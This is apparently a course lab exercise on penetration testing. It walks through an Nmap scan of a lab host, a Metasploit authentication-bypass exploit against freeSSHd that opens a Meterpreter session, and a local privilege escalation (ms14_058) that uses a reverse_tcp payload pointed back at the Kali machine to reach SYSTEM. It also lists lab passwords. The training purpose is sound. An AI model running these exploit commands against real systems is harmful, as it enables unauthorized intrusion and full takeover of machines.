Module 05: Network Penetration Testing Methodology-External /EX 3

Exercise 3: Pentesting freeSSHd Vulnerability and Gaining Privileged Access to a Machine

Scenario

Organizations use ssh or a similar service to facilitate their intra/inter-company communications. To communicate in a secure manner, organizations implement FTP/SSH to encrypt the data flowing through their communication channels. This mitigates the risk of unauthorized interception or misuse of data. Despite such security measures, hackers, with the help of various tools, are able to exploit certain vulnerabilities in these encryption algorithms. These hacks can allow hackers to have partial or complete control of the computers on the network.

You are the security administrator of your organization. Your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, and data and identity thefts.

A Trojan is a program, which contains malicious code disguised as harmless code or data. When executed, it can take control of the host and cause damage such as ruining the file allocation table on the hard drive. The objectives of the lab include:

• Pentesting the vulnerabilities in freeSSHd and establish a meterpreter session
• Pentest Windows OS vulnerability and gain Privileged Access

Lab Duration: 25 Minutes

1. Click Windows Server 2012 (External Network), click Ctrl+Alt+Delete.
   
2. In the password field click Pa$$w0rd and press Enter.
   

   You can use the Type Password option from the Commands menu to enter the password.

   
3. To install Nmap navigate to E:\ECSAv10 Module 05 Network Penetration Testing Methodology-External\Nmap, and double-click nmap-7.60-setup.exe. If an Open File - Security Warningpop-up appears, click Run and follow the steps to install Nmap (Zenmap) scanner.
   
4. To launch Nmap, double-click Nmap - ZenmapGUI icon on the desktop.
   
5. Zenmap (Nmap) main window appears as shown in the screenshot.
   
6. In this lab, we will perform an Intense scan on ports 1-100 of Accounts Department Subnet Cmachine.
   To perform the Scan, type nmap -p 1-100 -T4 -A -v 172.19.19.2 in the Command field and click Scan.
   

   In this lab, we are scanning IP address of the target machine located in the external network, whereas, in real-time, you will be scanning domains, for eg.: www.[targetwebsite].com with port number 22.

   
7. Nmap scans the provided IP address with Intense scan and displays the scan result in the Nmap Output tab as shown in the screenshot below.
   
8. In the Nmap Output tab, we observe that the port 45 is open, and the service running is SSH.
   The version of the SSH service is WebOnlyDo sshd 2.1.3 (protocol 2.0).
   We shall look now for the suitable exploits related to this version of SSH in Kali Linux Metasploit Framework.
   
9. Click Kali Linux (External Network). If Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
   
10. Type root in the Username field and click Next.
    
11. Type toor in the Password field and click Unlock.
    
12. Launch a command line terminal, type msfconsole and press Enter to launch msfconsole.
    
13. Since we found the SSH version as WebOnlyDo sshd 2.1.3, we shall search for this version in the msfconsole to find out if any exploits are available.
    Type search WebOnlyDo sshd 2.1.3 in the msfconsole and press Enter.
    
14. Metasploit returns suitable exploits for the specified version, as shown in the screenshot below.
    We will use freesshd_authbypass exploit in this lab, to compromise the FreeSSHd vulnerability.
    
15. Type use exploit/windows/ssh/freesshd_authbypass and press Enter to use the exploit.
    
16. We need to set the options associated with the exploit.
    Type show options and press Enter to view the options associated with the exploit.
    
17. Here, we will set the values of RHOST and RPORT. Our target machine (RHOST) in this lab is Accounts Department Subnet C with the IP Address 172.19.19.2, and FreeSSHd is running on port 45.
    So, enter the following commands in msfconsole:
    i. set rhost 172.19.19.2
    ii. set rport 45
    
18. Since we set the options, we will now exploit the machine.
    Type exploit and press Enter.
    The exploit begins to perform dictionary attack using its wordlist on the FreeSSHd server.
    
19. Upon finding the username, it starts injecting the shellcode into the remote machine and launches a meterpreter session as shown in the screenshot below.
    
20. Now, type getuid and press Enter to view the user that the Meterpreter server is running as, on the target machine.
    The command returns that the Meterpreter session is running as a regular user account (Admin01), which means you will not be able to perform privileged user actions on the session.
    
21. Type sysinfo and press Enter to view the information related to the operating system and its architecture.
    
22. Now, based on the operating system information, we shall use a suitable exploit that can help us attain privileged access to the machine.
    In this lab, we will use ms14_058_track_popup_menu exploit module.
23. Now, we need to background the meterpreter session in order to apply the ms14_058_track_popup_menu module.
    So, type background and press Enter.
    
24. Type use exploit/windows/local/ms14_058_track_popup_menuand press Enter to use the exploit module.
    
25. Now, we need to set the session value in this module and configure the payload.
    So, issue the following commands:
    i. set session 1
    ii. set payload windows/meterpreter/reverse_tcp
    iii. set lhost 172.19.19.7
    

    i. set session 1: This indicates that we are setting the 1st meterpreter session to this module.
    ii. set payload windows/meterpreter/reverse_tcp: We will be using this payload to perform exploitation on the target machine.
    iii. set lhost 172.19.19.7: This denotes the IP address of Kali Linux (External Network) machine.

    more...
    
26. Type exploit and press Enter to perform privilege escalation.
    
27. Once you hit Enter, the module exploits the vulnerability in operating system and presents a meterpreter shell with escalated privileges as shown in the screenshot.
    
28. Now, type getuid and press Enter to view the user that the Meterpreter server is running as, on the target machine.
    The command returns that the Meterpreter session is running as a privileged user account (NT AUTHORITY.SYSTEM), which means privileged user actions can be performed on the session.
    
29. Thus, you have exploited the vulnerabilities in Windows application and Windows OS to gain privileged access to the machine.

In this lab, you have learned how to:

i. Pentest the vulnerabilities in freeSSHd and establish a meterpreter session
ii. Pentest Windows OS vulnerability and gain Privileged Access